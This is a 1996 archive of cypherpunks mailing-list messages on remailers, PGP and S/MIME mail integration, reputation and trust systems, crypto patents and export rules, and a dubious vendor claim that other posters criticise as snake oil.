To: AwakenToMe@aol.com
Subject: Re: [noise] (was Re: PBS show)
In-Reply-To: <960615224725_135852446@emout07.mail.aol.com>
Message-ID: <31C42C22.4F4@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


AwakenToMe@aol.com wrote a smart-alecky response to Perry:
> ... Later god ...

I seem to recall somebody talking about how much more computer literate
the typical PC user is than typical Mac users.  So which do you use?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 17 Jun 1996 06:53:08 +0800
To: cypherpunks@toad.com
Subject: Snake Oil on the Water...
Message-ID: <2.2.32.19960616181936.00cb76fc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I recieved this on another list.  The snake oil is starting to flow pretty
heavy.  I expect it to get worse...



>Subject: Windows 3.x or Win95 FREEWARE Mail/Encryption Program
>X-UIDL: 788ef8d7083cb4f8e94b2c20183773b5
>
>Date: Sat, 15 Jun 1996 13:26:23 -0600
>To: freematt@coil.com (Matthew Gaylor)
>From: Joe Horn <6mysmesa@1eagle1.com>
>Subject: Re: Security and Freedom through FREEWARE Mail/Encryption Program.
>
>
>At the following two sites, you may download the FREEWARE Pegasus Mail
>program version 2.3.3 16 bit for windows 3.x or a version for WIN95. The
>unique thing about it, besides its simplicity and that it's a great mail
>program better than Eudora, it has a built in encryption program that is as
>effective as PGP and lots simpler. All you do is agree on a password with
>your correspondent. That simple. The encryption program and the mail program
>were developed in New Zealand, and were legally imported, so the encryption
>program is better than PGP, which is regulated by Federal Cypher Laws.
>Honest.Plus, it's free. The sites are:
>
>http://www.pegasus.usa.com/
>
>or
>
>http://www.env.com/tucows/files/winpm233.zip
>----------------------------------------------------------------------------
>
>
>****************************************************************************
>Subscribe to Freematt's Alerts: Pro-Individual Rights Issues
>Send a blank message to: freematt@coil.com with the words subscribe FA
>on the subject line. List is private and moderated (7-30 messages per week)
>Matthew Gaylor,1933 E. Dublin-Granville Rd.,#176, Columbus, OH  43229
>****************************************************************************
---
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 17 Jun 1996 07:22:40 +0800
To: sameer@c2.org
Subject: Re: alpha.c2.org in deep shit?
Message-ID: <199606161825.LAA02892@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I peeked at a few messages passing through my remailer from alpha.c2.org
(mea culpa) to see whether the problem might be at my end.  As far as
I could tell, the messages were correctly formatted and all, but simply
lacked message bodies.  So it looked like the data being sent from
alpha.c2.org was already messed up and had stripped the bodies.  I set up
an alpha.c2.org alias a few days ago and when I sent mail to myself I
got mail without a body, so I think it is a definate screwup.  I sent a
report of this to remailer-operators list but have not seen a response
yet from Sameer.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 17 Jun 1996 07:37:15 +0800
To: sophi@best.com
Subject: Re:  Netscape Mail Security and PGP Plugins
Message-ID: <199606161838.LAA03355@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Greg Kucharo <sophi@best.com>
>  A couple of questions I have right off the bat are;
>  1. In Hal's Java mail encryptor, what are the legal aspects of
> sending code across that contains crypto?

There are two main issues, export and patent.  Export laws keep it from
being used outside the U.S., and patent laws keep it from being used
within the U.S.  Everyone else should have no problem.

>  2. Can any plugin access the Netscape Mail program.

According to discussion on the coderpunks list, this is not presently
possible:

: From coderpunks-errors@toad.com  Sat Jun  8 18:33:32 1996
: Date: Sat, 8 Jun 1996 18:07:06 -0700 (PDT)
: From: Kurt Thams <thams@thams.com>
: Subject: Re: plugging in
: 
: On Sat, 8 Jun 1996, strick -- henry strickland wrote:
: 
: > > >> >You could hand any websurfer a Netscape PGP plugin without much work
: > > >> >at all, and you could easily build it on lots of platforms. After all,
: > > >> >look at how many platforms that lowly C code like PGP runs on.
: > 
: > not knowing what Netscape plugins do, 
: > let me ask the plumbing question: what would this do, and how?
: > allow users to send/receive encrypted PGP mail in the "netscape mail" window,
: > transparently like Raef's sendmail wrapper?
: > how do you invoke a plugin, when & why? 
: 
: This is not possible yet. The Netscape API doesn't expose the mail service
: to plug-ins. One would think that future versions of Navigator will do
: this, however. 
: 
: -- kurt thams
: -- thams@thams.com

However as has been mentioned here a PGP/MIME mail type could
theoretically be used to activate a handler for that incoming mail.  I
don't know exactly how this would work.  Glancing at the netscape plug
docs near <URL:
http://home.netscape.com/eng/mozilla/2.0/handbook/plugins/ > it appears
that plugins are activated on HTML page downloads, not (necessarily) on
mail receipt.  So unless you typically find your incoming mail on a web
page, it doesn't look like this will work.  I will ask about it on
coderpunks for clarification.

>  3. When is S/MIME going to be in Netscape, I tried to find info on the
> web site but thier statements about S/MIME seem vague.

Sorry, can't help you here.

>  I hope I'm not running over old ground, but this has to be alot more
> intresting than discussing that PBS show!

Agree!

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Mon, 17 Jun 1996 00:13:54 +0800
To: perry@piermont.com
Subject: Re: [noise] (was Re: PBS show)
In-Reply-To: <960615224725_135852446@emout07.mail.aol.com>
Message-ID: <19960616114750.26401.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
 > 
 > AwakenToMe@aol.com writes:
 > > new lows??? Its a rather reasonable question about the protected mode on the
 > > intel chips considering the limits of 640K mem...Sorry if Im not as 'versed'
 > > in proteected mode as you,master, seem to be. Oh please teach us lesser ones.
 > 
 > Some people really just don't get it, do they.
 > 
 > Let the sewer flow...

Perry, if someone is so clueless as to post a general programming
question to cypherpunks, do you think they're going to "get it"?  You
need to explain it in very   small   words.

This mailing list, cypherpunks, is about encryption.  It's not about
reminiscing about old personal computers (however much fun it is to
do) and showing off our respective ages.  Yes, you may consider this a
Russ-o-gram.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676       | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 17 Jun 1996 00:15:15 +0800
To: cypherpunks@toad.com
Subject: Re: More info on this?
Message-ID: <199606161159.LAA06198@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


>>           Lexis-Nexis, one of the nation's leading private 
>>           information brokers, has discontinued a new online 
>>           offering that provided access to 
>>           millions of individuals' Social Security numbers, after an 
>>           onslaught of complaints from customers and the credit 
>>           information bureau that originally supplied the data.  
 
 
An article in The NYT Sunday on criminal misuse of stolen and sold SS
numbers says: 
 
 
"Such trade in information is legal, and regulation is difficult, perhaps
even more so since a Federal appeals court ruling last week struck down
restrictions and defended the 'chaos and cacophony of the unfettered
speech' on the new medium." 
 
 
 
"The freedom for market aggression is a wisely hidden by the freedom to
argue." 
 
 -- Wealth Through Capitalist Anarchy: Friedman's First Amendment




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Mon, 17 Jun 1996 08:30:46 +0800
To: cypherpunks@toad.com
Subject: Re: Snake Oil on the Water...
Message-ID: <2.2.32.19960616192749.008f7570@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:19 AM 6/16/96 -0700, Alan Olsen wrote:
>I recieved this on another list.  

Me too :)

>The snake oil is starting to flow pretty heavy.  I expect it to get worse...

Here's the reply I sent to that list.  I cc'd the person who sent the
original message...

===========

At 01:00 PM 6/16/96 -0400, Joe Horn <6mysmesa@1eagle1.com> wrote:
[snip]
>At the following two sites, you may download the FREEWARE Pegasus Mail
>program version 2.3.3 16 bit for windows 3.x or a version for WIN95.

I like Pmail.  Had I not been an experienced Eudora user before I
tried it (and pretty stuck on the Eudora interface) I would have
probably stuck with it.  Kudos to the Pegasus team for releasing
a freeware program with such excellent filtering capabilites.  It
is much more of a full-fledged program than Eudora Lite, IMHO.

> The
>unique thing about it, besides its simplicity and that it's a great mail
>program better than Eudora, it has a built in encryption program that is as
>effective as PGP and lots simpler. All you do is agree on a password with
>your correspondent. That simple.

This would seem to eliminate the immense benefit of public key
encryption -- that you can send encrypted email to someone you
haven't met, without any prior communication.  If you have
security concerns, they will probably apply to whatever
communication media that you would use to agree on the password.
If I have a secure method to agree on a password with someone,
what the heck do I need crypto for?  ;)

Also, I'm assuming that you can only send encrypted mail to
other Pmail users.  PGP is above those kinds of limitations --
it can be used on many platforms and with many different types
of email packages.

> The encryption program and the mail program
>were developed in New Zealand, and were legally imported, so the encryption
>program is better than PGP, which is regulated by Federal Cypher Laws.

This is misleading, IMHO.

While the export of the US version is "regulated by Federal
Cypher Laws," PGP is not like some products which export a
weaker version to accomodate ITAR.  The version of PGP for people
outside of the US is developed outside of the US, and is just
as strong as the domestic version, AFAIK.

Some people's lives, business, etc. depend on what type of
crypto they use.  I don't think it's really appropriate to make
misleading claims like the one above when the stakes are that
high.

Please drop this claim for your promotional efforts, or back
it up with specific evidence showing how ITAR has weakened
PGP.

>Honest.Plus, it's free. The sites are:
[snip]

For those people who want to use PGP with Pegasus, there's a
nice little plug-in for Pegasus called PGP JN, by John Navas,
which allows you to choose to encrypt with PGP (you need to
have a copy) instead of the Pmail crypto.  It has a few small
drawbacks, IMHO, but I found it much easier to use than PGP
shell interfaces that require cutting text to the clipboard 
first.

John's program is available at:
http://www.aimnet.com/~jnavas/winpmail.html

I really think the Pegasus team would do better to mention
that John's program is available, rather than try to steer
people away from PGP.  PGP JN makes using the basic email
features of PGP more streamlined than most other mail
packages I've used (except Private Idaho, which is not a
full-fledged email package).  I think it would be better to
mention that both options exist, rather than seeking to
convert the masses away from PGP, which is unlikely to
succeed anyway, IMHO.

PC users who use PGP should try Pegasus and PGP JN.

Private Idaho is available from Joel McNamara's page, at:
http://www.eskimo.com/~joelm/


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Tue, 18 Jun 1996 13:04:03 +0800
To: WlkngOwl@unix.asb.com (Deranged Mutant)
Subject: Re: pretty good reputation
In-Reply-To: <199606161926.PAA10867@unix.asb.com>
Message-ID: <199606160732.MAA00213@fountainhead.net>
MIME-Version: 1.0
Content-Type: text/plain



Deranged Mutant wrote:
> > first, i would like to make it clear that i have no personal grudges against 
> 
> I never thought you did...

That was simply to ensure a flame free discussion. Almost anything I talk about
on my local bbs echos (back in India) turns out to be a flame war, specially
if its related to _touchy_ software like PGP :)
 
> > pgp, i have some interest in reputation systems which i am trying to pursue.
> > since pgp tries to model a reputation system and is being used world-wide,
> > i am using pgp as a model for discussion.
> 
> That's the point, though. PGP *does not* try to model a reputation 
> system.  When you sign keys, you only attest that you are sure that 
> that key belongs to the person whose name is on it.  A signature says 
> *nothing* about a person's reputation.
> This is meant to be used separately by each user of PGP.  If Alice 
> knows Bob personally, then she knows how trustworthy Bob is when he 
> signs a key, in relation to her.  This is not meant to be shared with 
> anyone else, and has no meaning to anyone else except Alice.

in that case if alice receives a key signed by bob, she would know
the key is good. and there is no need for the two other fields. 
infact the reason why i felt pgp is trying to model a reputation system 
if because of these two fields that carry trust values.
 
> You can't set up a global web of trust. It's computationally 
> infeasable, esp. with contradictions, to resolve.  It's also 
> meaningless.  Say Alice trusts Bob.  Bob trusts Carol.  Carol trusts 
> Don.  Should Alice trust Don? No... subjective factors like "trust" 
> don't commute.

this is precisely what i wanted to know. can there be a model wherein one
can compute a trust-like parameter? if yes in what ways should this parameter
be modified and qualified. or conversely what kind of qualification/modification
is required for computing trust?
 
> > copule of things you mentioned are intresting. in a reputation system the 
> > trust parameters are fuzzy and there are lot of layers (since we
> > are talking of a web of users), so we can't mix it with the liar paradox.
> 
> Yes we can.  There's been work done with the Liar paradox using fuzzy 
> logic.  Also other work in repuation webs ("Say the president of a 
> company asks all his vice presidents for their opinions about each 
> other, so he can appoint a successor.  How does he resolve 
> contradictions, when all he has are their opinions about each 
> other?").

lets say a reputation system involves alice, bob, carol and don. Computing
trust parameter with respect to each other can lead to situtions where
alice trusts bob x% and has y% proof that he is a liar, after considering 
all other relations. If this x% > y% she'll believe him, if not she won't.
thats why i feel the liar paradox doesn't really pose much of a threat.    
 
> > as far as halting problem goes, again can we reduce a reputation system to 
> > halting problem?  Infact alonzo church and some other scientists made
> > symbolic equivalents of turing's machine which could determine the broad 
> > limits of automatic computation. is there any research being done on reputation
> > systems that involves church's thesis? 
> 
> I mispoke slightly: I mentioned the halting problem in terms there 
> being non-computable functions.  There are people on the list (and 
> elsewhere) who don't have an inkling about the halting problem, and 
> propose security/reputation systems that fly in the face of it.
> 
> I've been working on a proof or discussion of a "Very Generalized 
> Halting Problem" that basically says that you can check that 
> something is "not x" from a set of tests to see if that something is 
> not "x"... if it fails at least one test, you know it's not "x", but 
> if it doesn't fail any, because such a set must be incomplete 
> (Goedel's Theorem...), you are never sure that it's "x".
> 
> How this relates to a reputation system? If you set up a global 
> reputation network where people tag each other in degrees of trust, 
> you try for completeness and end up with .  People will 
> contradict each other and there will be no way to resolve it.  Alice 
> says Bob is trustworthy to a degree, and Bob says Carol is 
> trustworthy to a degree, but Carol says Alice is untrustoworthy 
> (rates Alice lower).

There will be inconsistency only if trust/untrust values are absolute.
that is you either trust someone or you don't. i am talking of a system
wherein trust values lie between 0..1 which are derived from a set of
tags. in that case bob alice trusts bob x% bob trusts carol y% and carol
trusts alice z%. if z < x, z < y simply implies alice trusts bob, bob trusts
carol more than carol trusts alice. so the system will be relative rather than
absolute. a person who is trusted by more people will carry greater weight
and people trusted by him will carry higher weight too. this way snoopy
who is not trusted by many people will automatically have a weak relationship
with others.
 
> There's the other point that someone else on the list (Perry?) brought up:
> if people publicly rate each other, there may be social/political 
> pressure to give some people lower or higher ratings.

again these ratings will be decided in a web rather that on one-to-one basis.
that way the social/political pressure can be reduced though not completely
eliminated.
 
> And again, being a private rating system means 1) I don't offend 
> anyone since no one else knows how I rate them, and 2) there are no 
> contradictions because I am not relying on other's ratings to 
> determine how I rate them.
> 
> BTW, some work using fuzzy logic in terms of how people rate each 
> other is being done at the Group for Logic and Formal Semantics at 
> the University at Stony Brook (in Stony Brook, NY).  I went to school 
> there and still help out in the Philosophy Department and the 
> G.L.F.S. with some programming etc.  It isn't exactly the same as 
> ratings systems, but its close enough.

if any research work is freely available i'll be really interested. 

best,
vipul.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Mon, 17 Jun 1996 07:40:54 +0800
To: Hal <hendersn@zeta.org.au
Subject: Re: Remailer Operator Liability?
Message-ID: <1.5.4.16.19960616184459.32efa9ca@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12.58 PM 6/15/96 -0700, Hal wrote:

>I am pretty sure it is illegal, CDA or not, at least if the material
>is obscene rather than merely indecent.  As Declan says, the issue is
>accountability.  If the remailer operator ends up being considered the
>person who sent the mail, he could be in deep trouble.

This is the problem I have with the whole issue. Obviously, since nyms
use reply blocks, the remailer operators that are inside the reply block
have no control over what is sent (PGP-encrypted) through their remailer.

If I was to go out into the city, and tack up some porno on a building,
maybe something where kids walk by, then someone would take it down, most
likely, but there would be no tracing it to me, because I would be already
long gone from the building. We should make the best efforts we can to
make remailers fully anonymous. My ideas are more that accept PGP, and
(has this already been suggested and/or rejected?) automatic chaining.
That is, remailer #1 could automatically encrypt and send to #2, #3, ...
#n before going on to its destination. The number of added remailers and
which were used could be made random. (ie, have a list of remailers and
pick from it each time...) Would this work?

===============================================================================
David Rosoff (nihongo o chiisaku dekimasu)  ------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
===
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." <---- "Ulysses", by Alfred, Lord Tennyson



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcRVXhguzHDTdpL5AQFc1wP9GiJ6mXeAOY1x/7g1GrCPsWYEZlS5iq84
wfKwgs1W8L+PBQcbrgdhyK2RKDJ7sFrCbz0eSa3OLbDiw5NeKD0LSDAvxuF3Redu
aUpv4yWdYMz71sHz8MF7TxzdOo5a6dg3XtIaRA3Sbt4i2p9dozm/Xg5h4vhgKwWu
/nG1BhTlNGs=
=O4wy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hayashi_Tsuyoshi <take@barrier-free.co.jp>
Date: Sun, 16 Jun 1996 16:09:50 +0800
To: cypherpunks@toad.com
Subject: MITI began to develop electronic notary system
Message-ID: <199606160406.NAA00481@ns.barrier-free.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


A small report.

-----BEGIN PGP SIGNED MESSAGE-----

Sun Jun 16 JST 1996,
Nihon Keizai Shinbun (called as "Nikkei" in Japan),
Side: 1

## XURL: X.16Jun1996JST.newspaper:xy//Nikkei/1/x210y0/
====

# NOTE: [insufficient] translated and summarized by me.
#
#	[untrusted] ... Because I don't use English very
#	well.  Sorry.  I recommend that you will read a
#	English version of Nikkei Shinbun.

o MITI (Japanese Government's Ministry of International
Trade and Industry) began to develop electronic notary
system with some biggest computer company in Japan;
Hitachi, Nihon I.B.M., NEC and Fujitsu.  Some Japanese
bigger bank (such as Daiichi-Kangyo Bank) will also take
part in it.

o It seems to me (by reading this article) that MITI want
to develop Japan-original technology for the electronic
notary system.

o Milestone of the plan:

 - Misc. preparations for it until the end of 1996.
 - Doing experimental examination in 1997.

# I don't know that 1996/1997 are fiscal year (called
# "(kaikei-)nendo" in Japan) or not.  Japanese fiscal year
# starts April in every year.

o This system will be applied for following term:

 1) submitting of public docments to public offices,
 2) electronic commerce,
 3) electronic publishing,
 4) electronic warehouse service.

o IC card will be used in order to store digital key
information.

///

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMcOHvNYQrW27B3yFAQEO2AP/YZsgZ+cQLrztUIQMmBeOC5X53RVlBldH
SHG/QkydKd37un5OYC5HMUBdqgCWO9jfVtrCdZg10i6QKeWsdz02m2HcmYTcArLv
X9i2+KRuih6eBtxaxKfKV97TZC9bVzbv4J3c+2YEU7C2KNFB/IbwEpoSzu4MOkYo
3uMwGJV9etc=
=h/sH
-----END PGP SIGNATURE-----

- Tsuyoshi Hayashi <take@barrier-free.co.jp>
- PGP public key: http://www.barrier-free.co.jp/take/pgpkey
- (CF 27 34 5B 46 FA 2A 12  D2 4C E3 F7 2A 45 E0 22)
- Barrier Free, Inc. (established on 25 Jan 1996)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: middle-man-admin@nym.jpunix.com
Date: Mon, 17 Jun 1996 06:36:33 +0800
To: cypherpunks@toad.com
Subject: Bye Bye Middleman
Message-ID: <199606161808.NAA06596@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


To Whom it may Concern:

	The middleman remailer has not been as robust or reliable as I had
hoped. It relies too heavily on the nym servers and the reliability of the
other remailers that it randomly selects. As you can tell by Raph's list,
middleman has not responded to a ping a ping in some time. I've been
looking at the process for several days now and have come to the
conclusion that it will probably never achieve a level of reliability that
will make it a reasonable remailer. With this in mind, I am formally
announcing the retirement of the middleman Type-II remailer. It was an
interesting experiment but it just didn't pan out. 

				middle-man-admin@nym.jpunix.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 17 Jun 1996 06:38:53 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] (was Re: PBS show)
Message-ID: <960616141050_557406238@emout16.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-06-16 06:17:43 EDT, perry@piermont.com (Perry E.
Metzger) writes:

<< AwakenToMe@aol.com writes:
 > new lows??? Its a rather reasonable question about the protected mode on
the
 > intel chips considering the limits of 640K mem...Sorry if Im not as
'versed'
 > in proteected mode as you,master, seem to be. Oh please teach us lesser
ones.
 
 Some people really just don't get it, do they.
 
 Let the sewer flow...
 
 .pm
  >>
Guess Not. Maybe thats why I subscribe to mailers. So I can learn and share
what I know. Although the internet is such a vast resource..... it is
nevertheless an area where egotistical, hard headed, and very arrogant people
lurk. Take this to heart some of you. Remember... internet is information. 
let the sewer flow?? Man.. get outside one of these days.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 17 Jun 1996 06:30:25 +0800
To: perry@piermont.com
Subject: Re: [noise] (was Re: PBS show)
Message-ID: <960616142141_557410629@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-06-16 11:57:22 EDT, nelson@crynwr.com writes:

<< 
 Perry, if someone is so clueless as to post a general programming
 question to cypherpunks, do you think they're going to "get it"?  You
 need to explain it in very   small   words.
 
 This mailing list, cypherpunks, is about encryption.  It's not about
 reminiscing about old personal computers (however much fun it is to
 do) and showing off our respective ages.  Yes, you may consider this a
 Russ-o-gram.
  >>
Yes you are right. BUT its funny. I only asked something about another
mailing that was done yesterday about real-protected mode and the chip
desing. So while its there.. why not take a question outta it!! hehe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Mon, 17 Jun 1996 08:43:54 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Proposal: PGPmail Plugin for Netscape/Mosaic
In-Reply-To: <199606152019.NAA02248@jobe.shell.portal.com>
Message-ID: <31C491F9.C9C2F80@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sat, 15 Jun 1996, Hal wrote:
> 
> > There was a little discussion about this on the coderpunks list, but I
> > didn't get the impression that anyone was ready to run out and do it.
> > I'm not sure whether plugins could also be used for receiving mail in
> > addition to sending, but if so it does seem like a good way to add the
> > functionality.
> 
> Netscape does have support for MIME.  So if PGP/MIME ever becomes more widely
> used, the Netscape mail program would decrypt and verify emails automatically.

I certainly don't want to stand in the way of such a plugin - it
certainly sounds like an interesting idea. However, the problem that
Netscape does not export mail through the plugin API sounds quite
difficult - it seems likely that, barring changes to the plugin API, an
entirely new and parallel mailer would need to be developed.

In the meantime, it is possible to integrate Unix Netscape with PGP
today, using premail. This includes fully seamless and transparent
support for PGP/MIME. In addition, you get support for the anonymous
remailers thrown in for free.

The main problem with the current release (0.43) is the lack of adequate
documentation. The near-mythical "next release" should fix that, when I
finally get it done.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Mon, 17 Jun 1996 09:04:10 +0800
To: Greg Kucharo <sophi@best.com>
Subject: Re: Netscape Mail Security and PGP Plugins
In-Reply-To: <31C39529.133B6630@best.com>
Message-ID: <31C494FF.7B1A422@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Greg Kucharo wrote:
> 
> There hasn't been a lot of discussion on this list about the future
> of secure e-mail via Netscape. The most i've seen has come from
> Raph Levien on the standards battle between S/Mime and other various
> implementations including one using PGP. Raph has said at various
> Cypherpunks meetings now that( and not wanting to totally put words in
> his mouth) the PGP based implementations have lost ground to S/MIME.

I certainly believe this - PGP now has the first real challenge to its
continued viability.

I would like to emphasize (at the risk of repeating myself) that it now
looks quite possible that the limitations of S/MIME that I discussed at
the next-to-last cpunks meeting will be addressed. It hasn't been
formally decided, though. I'd say this is an important opportunity for
cypherpunks to make themselves heard. S/MIME as it is currently defined
has severe implementation weaknesses. There are two concrete proposals
on the table to fix these problems - lobbying the S/MIME people will
help.

>  The reason I believe that this whole area has received so little
> quarter on the list is that either few people use Netscape for e-mail
> and that few people actually send encrypted e-mail.

Undoubtedly a combination of both.

>  I'm going to try and put together a compendium of web links on this
> so it's a little easier to track the developments and various schemes.
>  At the second to last Cypherpunks Bay Area meeting we had a discussion
> of crypto GUI's. It's my opinion that Netscape would be an excellent
> place to start because it does encryption relatively seemlessly.
> Incorporating S/MIME into the mail would be a great step forward in
> bringing easy crypto to the general community. Any PGP plugin I would
> hope eleviate the many UI problems PGP has.
>  A couple of questions I have right off the bat are;

>  1. In Hal's Java mail encryptor, what are the legal aspects of
> sending code across that contains crypto?

Almost undoubtedly still illegal, unless Pro-CODE passes.

>  2. Can any plugin access the Netscape Mail program.

No. As currently defined, the Netscape API does not export mail.

>  3. When is S/MIME going to be in Netscape, I tried to find info on the
> web site but thier statements about S/MIME seem vague.

I hear conflicting reports on this myself, but my best guess would be
some time this fall - probably just a month or two before PGP 3.0 ships
;-)

>  I hope I'm not running over old ground, but this has to be alot more
> intresting than discussing that PBS show!

Agreed.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Mon, 17 Jun 1996 09:52:26 +0800
To: cypherpunks@toad.com>
Subject: new type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960616161536.8886A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello everyone,

	A new type2.list/pubring.mix combination that reflects the
retirement of the experimental remailer, middleman, has been posted. You
can get it by web from www.jpunix.com. or by FTP from ftp.jpunix.com.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcR58lOTpEThrthvAQGocgP/V3UuU11iwo6Yme295YygWqXekKKxkXXH
4u94vrwkYF3qTT+9W3vrgRuUueOf/xF6FP0FZj14wc0sZ51wAnHvPxpHNxzoXuFH
Z7IAOv7MsSfm8Cn2/kFqK+KAGlaKRFpHzJUZS61Oo2u7HrLvejjNd4ZOfAhZ83m7
opBUlcYqCPA=
=0LW8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 17 Jun 1996 09:18:52 +0800
To: sameer@c2.org
Subject: Re: RSA patents in Canada
In-Reply-To: <199606112304.QAA22657@atropos.c2.org>
Message-ID: <Pine.3.89.9606161647.A19358-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 11 Jun 1996 sameer@c2.org wrote:

> 	Anyone have a definitive source on the state of the RSA patent
> in Canada? Thanks.

I keep hearing that it is only patented in the States by virtue of having
been presented in public before the application (which they did to avoid a 
gag order). I know that Schneier and others list it as only patented in 
the States. 

Are you wondering whether some odd provision of NAFTA would give it
protection in Canada? Otherwise it should be public domain. Anyone else
know for certain? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Mon, 17 Jun 1996 12:07:06 +0800
To: "Declan B. McCullagh" <markm@voicenet.com>
Subject: Re: Does information want to be free?
Message-ID: <9606162128.AA00301@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 PM 6/14/96 -0400, Declan B. McCullagh wrote:
>I confess I was amused by how he described
>those Internet anarchists who delighted in publicizing books that should
>in fact be restricted.

        I am amused (though I am not taking sides) by the general lack of
attention or rhetoric that "crypto-anarchists"/"crypherpunks"/whatever,
otherwise privacy respecting people, usually espouse.

        If someone found out all the medical information of cypherpunks list
members and distributed about the Net, how would people feel? (This is a
rhetorical question, and I am familiar and agree with some of the arguments
regarding public interest, public figures, copyright isn't a privacy
protecting mechanism, yada yada yada. Just something to think about, what if
large corporations, public interest groups, lobbeys, or governments can use
this as a precedent against "us".)
_______________________
Regards,            Democracy is where you can say what you think 
                    even if you don't think. -?
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Mon, 17 Jun 1996 11:37:38 +0800
To: Cyperpunks Mailing List <cypherpunks@toad.com>
Subject: Re: alpha.c2.org in deep shit?
In-Reply-To: <199606161825.LAA02892@jobe.shell.portal.com>
Message-ID: <Pine.NEB.3.93.960616181221.1490B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP MESSAGE-----
Version: 2.6.2

